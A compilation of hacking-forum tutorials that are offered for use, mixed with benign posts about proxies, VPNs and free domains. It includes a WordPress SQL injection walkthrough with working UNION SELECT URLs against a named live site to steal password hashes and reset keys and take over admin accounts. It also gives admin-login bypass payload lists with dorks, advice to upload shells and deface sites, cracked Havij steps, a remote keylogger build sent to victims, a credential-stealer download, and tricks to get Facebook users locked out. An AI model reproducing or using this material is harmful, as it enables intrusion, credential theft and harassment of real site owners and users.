Hacking Wordpress Without Hash Cracking


The title says am going to show u how to hack a wordpress site without cracking the hashes.Now this works with all the wordpress sqli exploits ever posted in any of its themes or plugins.
Point to remember: 
You cannot exploit the latest version of wordpress with this [3.4.2] which was released on 6th -september 2012 yea u heard it right released this month now there are still tons of websites out there which haven't been updated yet all the previous version can be exploited using this method ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe

1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is.
Code:
inurl:"/?fbconnect_action=myhome"

Now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites.
2) Now the website im going to use here is
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2

Here the parameter userid is vulnerable to sqli. So lets see what we can get from the data base.Im going to change the above URL with this :
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)​,7,8,9,10,11,12+from+wp_users--

Now u can see we got the username with the email id
Now if i change the above URL to this :
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),​7,8,9,10,11,12+from+wp_users--

Im going to get the user name and the hashed password
Point to be noted here :  Im using concat here .. u can also use group_concat to get all the users again that would be ur knowledge how u use sqli.
Now we all know that wordpress hashes belong to the category MD5(wordpress)(different from simple MD5) and are very hard to crack but if ur mad u should think out of the box
So now follow the steps
a) Go to the login page of of wordpress site .. in my case that would be.
Code:
http://masaru.ikeda.me/wp-login.php
 b) Click on Lost your password ?
c) Now the wordpress will ask me for the username or email for which i want to reset the password in my case that is 'masaru' so go ahead and enter the username .

d) Now look closely it says "Check your e-mail for the confirmation link."
e) Now what wordpress does actually it sends an activation key to the email address of that user and it sets the value of activation key in the database aswell what u have to do is just to get that key .. 
f) So now im going to change my URL to this to get the activation key
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--

And u can see we got the activation key here u should note it down somewhere.
g) Now finally all we have to do is without going to the email address reset the password for that im going to add this to my URL .
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

And im going to replace the KEYHERE with the activation key i got and the USERNAME HERE with the username which in my case is 'masaru' so my URL will be :
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

The wordpress will ask u for ur new password
Now go the login page again and try the new password and there u go u got access to the panel
WANT TO KNOW THE VERSION OF WORD PRESS ?
Now to chk quickly if a website is using the latest version 3.4.2 or previous versions goto the login page and see if there is an option there to go back to the main page of the blog like in my case see the option : like in my case see the option : -- Back to Digital Way of Living then this is not 3.4.2 if u don't see this option .. then it is 3.4.2 this trick is not legit i figured it out and is working for me :
Hope you will like this .. : ) 
IT WORKS PERFECT FOR ME CHECK OUT :
Hacked WordPress site : http://standzahra.id1945.com/

HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx


Try to make your own dorks also to get more success rate :

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Use the above mentioned login details and you will be into the admin panel of a website. It will not work for all the websites you will find, but will work on most of the websites.

Other InjecTion Queries:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)


100 % Working Bypass Mobile Number Verification in Gmail,Fb,Yahoo,etc

First of all , Visit this website.

http://receive-sms-online.com/

In that website You can find some numbers.
Choose one number & click it.
Then Copy that mobile number & put that mobile number wherever verification code asks !!
Finally , u will receive verification code in that website..
Thats it !!!

This method will be very useful while u r creating a new accounts like gmail,yahoo,etc.
This will receive almost all Verification Codes !!
Hope it will works fine ...

Which Programming Language Should I Learn For Hacking ?


Why Programming
So the first question many people will ask is why should i learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All i need to know is how the tool works and what is the purpose of it ?. The Answer for the question is both an Yes and No, You can become a Pentester/Hacker without knowing any programming but how ever your not going to become a good  pentester /Hacker.
So Knowing Programming Will
Differentiate you from Script kiddies and Tool Lovers
Help You in Understanding About Vulnerabilities
Help You in writing Your own tools, scripts
Help You in writing exploits, Shell codes etc
Help You modifying Existing scripts, tools according to your needs

Which Programming Language to Learn ?
So now that you have understood the importance of knowing programming, The next question in your mind is which programming language should i learn, The answer for this question depends on your interests and goals

For Web App Pentesting /Hacking
HTML
Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don't know HTML you should first learn it
JAVAScript
Learning java script. Will help you understand the basics of Cross Site Scripting
PHP/SQL
Majority of web applications are written using PHP and MySQL .So it is a must to learn PHP

For Writing / Understanding Exploits, Shell Codes, Root kits etc
C & C++
More than 60 % of the exploits you will find on the web are written in C & C ++, Learning C & C++ will help you understand about Buffer overflows, Stack overflow etc, So learning C and C ++ is must for every hacker/Pen tester
Assembly
Learning assembly will help you in Writing/understanding Shell codes , Will Help you in Reverse Engineering applications and software's

For Building Tools And Scripts
Python
Python is a very powerful high level language , Its Easy to learn and code, most of the tools and scripts for automation are written in Python . Knowing Python socket programming will help you a lot in Exploit writing
Ruby
Ruby is an another language which is used to write scripts, tools. Metasploit Frame Work is written in Ruby. so learning ruby will help you understand the in and outs of msf
Bash
Learning Bash is very Useful in writing small scripts for automatio


How To Use A Proxy Server Online To Become Anonymous All Browsers


This is a simple tutorial on how to become anonymous online and add a proxy to your chosen browser.
To get a proxy list use google or these sites http://spys.ru or http://proxy-list.org or http://www.hidemyass.com/proxy-list/

WINDOWS:
This guide shows you how set up your browser to work with an (anonymous) HTTP proxy server.
The proxy address along with the port number should look like this:
124.37.94.216:1789
The address is “124.37.94.216″. The port is the part behind the colon, “1789″.
Caution: (Please do not attempt to use the above example as it is only numbers pulled from the air and not intended to be used).
Please note: Sooner or later your proxy will stop working or it may not work from the start … even if you properly tested it first. Regardless, when it doesn’t work, simply repeat the process with another proxy.

Firefox 2.x and 3.x
Setting up Mozilla Firefox to use a proxy is a simple and straight forward task. It only differs a bit on each operating system.
Run Firefox.
Click Tools from the menu bar.
Click the Options menu item.
Now click the Advanced icon at the right side.
Click the Network tab.
In the Connection field, click Settings
Click Manual proxy configuration:
Enter your selected proxy it in the correct field. The first field is the address, the second field is the port. If you are using a HTTP proxy then click the box for, “Use this proxy server for all protocols“.
Click OK.
Click Close.
It should not be necessary to restart Firefox.
* * * * * * * * * **
Internet Explorer 5.x, 6.x, 7.x with a LAN, DSL or Cable connection:
This method will only work when you are not connected over a dial-up modem. If you are using a dial-up modem, look at the instructions below.
Open Internet Explorer.
Click the Tools item in the menu bar, in Internet Explorer 7 it is a button at the right side.
Now click the Internet Options menu item.
Click the Connections tab.
In the “LAN-Settings” field, click Settings
In the Proxy server field, make sure the Use a proxy server for your LAN box is checked.
Enter the the proxy’s IP in the Address box, and the Port in the Port box.
Click OK.
Click OK again.
It should not be necessary to restart Internet Explorer.
****************
MAC OSX:
Firefox 2.x and 3.x
Click Firefox in the menu bar.
Click the Preferences menu item.
Now click the Advanced icon at the right side.
Click the Network tab.
In the Connection field click Settings
Click at Manual proxy configuration.
Now, according to the proxy type you use, enter it in the correct field. The first field is the address, the second field is the port.
Click OK.
Click Close.
It should not be necessary to restart Firefox.

ADDITIONAL NOTES:
If you have cookies left in your browser, sites may identify you by using them. Therefore, if your goal is to be anonymous, then delete all cookies before using an anonymous proxy. You can also be identified as a specific user if you login to your existing accounts with your proxy connection, if you have previously logged in with your (real) IP. As a result, you always sign up for new separate account that you use only with your proxy or proxies.

Hack A Site EASY [ SQL Inject With Havij v1.16 ]

This is a simple tutorial on how to hack sites with Havij v1.16 
In this tutorial I assume that you already know how to find a vulnerable site, and I wont go through that part.

Knowledge is free, but the one who are reading this are responsible for how they use this knowledge.
Please note that this is Illegal in most countries.

With that said, download Havij v1.16 Pro for free (Cracked) and follow the steps.
Download from here OR you may find the file in google :   Haviji v1.16

Hidden Content:
    Step 1 - Analyze target and find Database
1. First find a vulnerable site, and then copy the URL of it.
2. In Havij, paste the vulnerable link in the 'Target' section as shown below:
3. Press 'Analyze'
picture:
Now you will get information about the site such as Host IP, Web Server etc.
Here the Database is called 'Vize' as shown in the picture under 'Current Database'.
Picture:
Step 2 - Get Tables and Columns
    1. Head over to the 'Tables' section and press 'Get Tables'.
Picture 1
So here is our victims Tables:
2. Now select 'users' or any other relative Table and click 'Get Columns'.
Picture 1
3. Now you should have some columns called things like 'ID', 'Usernames', 'Passwords' or something similar.
Picture:
In this case we had 'login' and 'passwd' and it seemed to be relevant.
Step 3 - Get Admins login details
       1. Select all relative columns and press 'Get Data'
1. Go to the 'Find Admin' section and press 'Start'.
It'll now start scanning
Success! Here is our admin page!
2. Go to the URL and Log In with the admin credentials we found in Step 3, have fun!

Top 10 Websites To Register Your Domain For Free


Hello Guys , i know many of you wanted to get a free domain registration , so i collected some for you , 
These are the 13 Website registrars who registers you a free domain and Web Hosting. 
Register your Free Domain Now!!

1) .tk
 Dot TK is a FREE domain registry for all websites on the Internet. It has exactly the same power as other domain extensions, but it’s free! Because it’s free, millions of others have been using .TK domains since 2001 – which makes .TK powerful and very recognizable. Your website will be like http://www.yourdomainname.tk .
It is free for 1 year. It’s a ccTLD domain whixh having the abbreviation Tokelau.
To create a .tk domain, Visit  http://www.dot.tk
2) co.cc
Co.cc is completely free domain which is mostly used by blogspot bloggers because of it’s easy to use DNS system. Creating a co.cc for blogger is simple . Your website will be like http://www.yourdomainname.co.cc 
To create a .co.cc domain, visit http://www.co.cc
3) co.nr
 co.nr is too like co.cc. Your website will be like http://www.yourdomainname.co.nr .
You can add it for blogger also..
To create a .co.cc domain, visit http://www.co.nr
4)  .free
It’s also a free domain registrar which has the offcial applicants of Google,Amazon, Dotnuts, etc…
It’s very simple to register. Your domain name will look like this http://www.yourblogname.free .
To create a .free domain, visit http://www.dotfree.com/
5) com.nu
com .nu is also like co.nr domain and it provides a free web hosting. You can register many domains than com.nu like 1x.de, 1x.biz, etc… To know the features of that website go to: http://www.com.nu/features
Your domain will be look like http://www.example.com.nu .
To create a .free domain, visit http://www.com.nu .
6) indiagetonline (only for residents of India)
This is the who had partnership with Google, Hostgator, ICICI bank and Federation of Micro, Small and Medium Enterprises . In this website you can registed a ccTLD domain that is .in Domain 1 year for free. This website has more features. It offers a free website builder with 365 days free online support !!!. Your website will look like this- http://www.example.in .
To create a free .in domain for 1 year, visit http://www.indiagetonline.in
7) tipdots
You can a free domain for ever. The features of the domains of this website is present on http://www.tipdots.com/features . You can register many domains with the last word as .tp like http://www.example .us.tp , http://www.example.ca.tp , etc..
You can register free domains by visiting http://www.tipdots.com/
8) biz.nf
 Biz.nf is a both free and paid domain registrar that you can register a free domain or a paid domain like .com , .net, etc..  You can register free domains like http://www.example.biz.nf ,www.example.co.nf
It also offers free hosting.
To register a biz.nf or co.nf free domain, visit   http://www.biz.nf
9)  smartdots
It’s also a free domain provider.
That allows you to register domains such as http://www.example.net.tc , http://www.example.eu.tc , etc..
To create a Free domain in that website, visit http://www.smartdots.com
10) unonic
It’s also a free domain provider. The features of the domains which you register in unonic.com will be present on this following link : http://www.unonic.com/features/
It offers you to register domains like http://www.example.net.tf , http://www.example.eu.tf , etc….
To register a free domain with unonic visit http://www.unonic.com





How To Get FBI Login Screen

 FBI Login Screen
1) Download LogonStudios here:  LogonStudios
2) Install LogonStudios.
3) Download the FBI logon file here: FBI logon

That's pretty much it, enjoy ! :D



Find Out Your Number 1 Stalker On Facebook[2013]

How to find who out who stalks you the most on Facebook:
Right Click your internet browser while on Facebook page
1. Click view Page Source
2. Typee Ctrl + F 
3. Enter ordered_
4. Look for the First Numbers then copy it and put it after http://www.facebook.com/Enter-Number-Here

Now you can see who stalk[see your account most of the time].....

How To Kick/Lock People Off Facebook

How to Kick anyone off Face-book!

1. Go to Victims Profile (must be friends)
2. Click settings, then Report/Block.
3. Click "Submit Report" then tick the "Report ???? account"
4. Click "This is Fake Account" and tick the "Other" circle.
5.  Tick "Submit Report" and click continue.
That's it, now they will be kicked off Face-book till they can prove they own the account with security questions/mobile verification.

How To Start Your Own Webshoting For Free


I am going to share an private method to start our own web hosting site with many features for free but few people knew about it .

Some of its features are :

* Host unlimited clients and domains
* Unlimited disk space & bandwidth
* Multiple cloud based servers!
* Over 1000+ IP addresses
* Ability to provide free and paid hosting
*Ability to control hosting accounts
*Ability to register & manage domain names
*Integrated client help desk
*Integrated billing & invoicing system
*News, announcements and knowledge base
*SSH web console application
*Auto installer with 50 most popular scripts
*Easiest to use website builder with over 100 templates
*AtMail Pro, Rouncube and SquirrelMail webmail clients
*2 web based file managers
*phpMyAdmin tool to control databases
*Ability to manage over 40 features and functions for your website!
*Fully featured DNS zone editor
*Unique website and database import tools
*Setup error pages, multiple FTP accounts, generate backups
*Advanced tools like cron jobs, IP blocker, hotlink protection
*And many more!

Singh Up here : http://www.youhosting.com/



How To Get A Free .com Domain



I'm giving You my newest tutorial on how to get a free .com or other domain. It takes about 30 minutes to get the site working, which I consider as very fast.

Feel free to comment and use this wisely!

Tutorial Here  : http://www.mediafire.com/view/?fs3v32g0asc3avi

How To Hack Facebook Using Remote keylogger


Q) What is a keylogger?
A) A keylogger is a program or software which logs or track the keystrokes by the user and saves them into a file.


Q) Where does it saves the Keylogs?
A) It saves the logs into a text file which is present either in windows directory or in cache memory .

Q) Since it saves logs in the Pc ,do i need physical access to that computer?
A) Not necessarily ,It depends on the keylogger you are using .If you are using a remote keylogger you dont need physical access to that computer. The logger will automatically upload the logs to your **FTP SERVER** ,website,email...


Steps - 

1) Download and extract all the files in  : http://www.mediafire.com/?rm9aei369ha5h8t

2) Open FKS 2.0.exe

3) Server name : enter any name you want but it should resemble to something related to windows processes ,something like "csrsss.exe" or "explore.exe".

4) Reg key : leave it as it is.

5) Remove file : You could enter any weird name.

6) slave name : enter your slave 's name .

7) Get and exec : Leave it as it is.

8) Go to Logging options by clicking on "logging Options" in Left side.

9) Log File Name : Enter your slave 's name with a .txt extension example :  rishabh.txt

10) When log gets _____ bytes long, upload it . : Enter 5000.

11) Go to "Upload Options" .

12) Enter the Ftp server details accordingly Server host in "ftp server" ,user name in "FTP user" ,password in FTP password and /victimname in "upload dir".

13)After that click on build server and your keylogger will create a file named server.exe in the keylogger directory i.e. the folder where you extracted the Fks files.

14)Rename server.exe with something cooler like "counter strike 1.6" or anything else.

15)Send this file to your Victims .As soon as he executes the file ,His logs will start uploading at your Ftp server.

16)After that open Filezilla and fill your Ftp details.Then it will show 2 columns one containing your Hard disk data in the right side and other in the left will be your Files in your web hosting account . Download the logs to your pc and Serach for email accounts and their passwords.
You will find many other intersting things too in that file like what your slave searches on google, 



Setup Virtual Machine + VPN


 Setup Virtual Machine + VPN

Have you ever wanted to use two PC's with two different IP addresses? Well now I will show you how. A VM, or Virtual machine is a virtual computer, on your own computer.

Why would you want such a thing? Well, you could use it for malware testing, double your VPN's for extra security etc.

Things we will need:
1. VMware - http://www.softpedia.com/get/System/OS-Enhancements/VMware-Workstation.shtml

2. .ISO of the OS you want to install, a .iso is a virtual disk. For this tutorial I will be using Windows.

3. OpenVPN - http://openvpn.net/

4. VPN of  your choice, there are so many free VPN there .

Once VMware is installed, move to the instructions.

How to set up VM + VPN in VMware
1. Go to file, then new virtual machine or push CTRL+N.
2. When it asks where to install, find the .iso file.
3. Fill out location details.
4. Chose hardware setting in the tab before the install. I suggest using only what Ram you can spare, and all of your processor power.
5. Hit install, and wait for it to install.

Setup of OpenVPN

1.Now that VMware is installed install OpenVPN on the desktop of your VM. Make sure TAP/Tun drivers get installed or it will not work.
2. Open install directory, and drag and drop the files you got with your VPN. If you bought AnonVPN you will see this.

3. Then right click on the OpenVPN gui in the hidden icons of your notification bar and hit connect and you are done after entering your username and password!

Dracula Logger


Features
-Fully undetected (I may drop in every once in a while to clean up the detections. 
-Custom Installation/Startup Path
-Icon Changer
-Assembly Changer
-Multi File Binder
-Cure (Removes infection if you happen to accidentally, or intentionally infect yourself)
-Installation Persistence
-Execution Guard
-Fake Error Message
-Multi File Downloader
-Melt (Self deletion after execution)
-UAC Bypass (Beta, may not work 100% of the time)
-Extension Spoofer
-Stealers
--Firefox
--Chrome
--Opera
--MSN
--DynDNS/No-IP
--FileZilla
--Pidgin
--IMVU
--Common CD Keys
--Bitcoin Wallet
--Minecraft .lastlogin


Working Snap

Download Link
http://www.mediafire.com/?bid1a4jn8zsvubd

Facebook 200-1000 Likes In 60 Seconds

Hello! as the title says how to get free facebook likes on your pictures /status! no download!

1: So the first thing you need to do before starting is to enable subscribers on your facebook you can do that here: www.facebook.com/about/subscribe

2: Head over to http://likelo.com/ then click where it says "Click here" And Allow Permission To xPeria To Get Access Token

3:allow the xperia applicaton then copy the text in your webbrowser search bar. And paste it in the search box at Likelo.com

4:choose the photo or status to being liked! Then PANG you got between 100-300 likes!

5: go to accountsettings on facebook>Applications>DELETE the xperia application you allowed in step 3 otherwhise you will also start liking others pics/status.

Done!

Similar site you can use after to get around 100 extra likes: http://powerlike.org/

Top 4 Best Free VPN Service Providers 2013



If you're of the mindset that what you do with your BitTorrent client is your business and not that of people snooping, sniffing, and prying at your packets along the way, then you'll need a VPN to keep your traffic encrypted and secure. Even so, which free VPN service is the best, and which offers the best combination of reliability, features, security, and affordability? We'll be looking at the top five free VPN service providers based on test.


SecurityKiss is a popular free VPN service available for use on PCs only. The paid version available for use on Mac, Linux, and smartphones.

The free package includes a 300MB daily limit, and an unspecified bandwidth speed cap of less than 12.5 Mbps, and basic packages start at about $6 per month.

Software installation is required.

2. Its Hidden

ItsHidden uses 128-bit encryption on the secure tunnel created between you and the ItsHidden servers. Based out of the Netherlands, ItsHidden takes advantage of the legal climate there and doesn't log any activity passed through its servers.

Available on Mac, PC, and Linux, and requires no software installation.

3. CyberGhost

CyberGhost VPN is a free utility that encrypts, anonymizes, and offshores your internet use when you're using public Wi-Fi at an airport or coffee shop, or you're worried someone on your network is running a tool like Firesheep to gather credentials

Cyber Ghost is limited to PCs only, and software installation is required.

5. Your Freedom
Your Freedom services makes accessible what is unaccessible to you, and it hides your network address from those who don't need to know. Just download the client application and install or just run it on your PC; it turns your own PC into an uncensored, anonymous web proxy and an uncensored, anonymous SOCKS proxy that your applications can use, and if that's not enough it can even get you connected to the Internet just as if you were using an unrestricted DSL or cable connection -- just like the firewall suddenly went boom! You can even make your PC accessible from the Internet if you like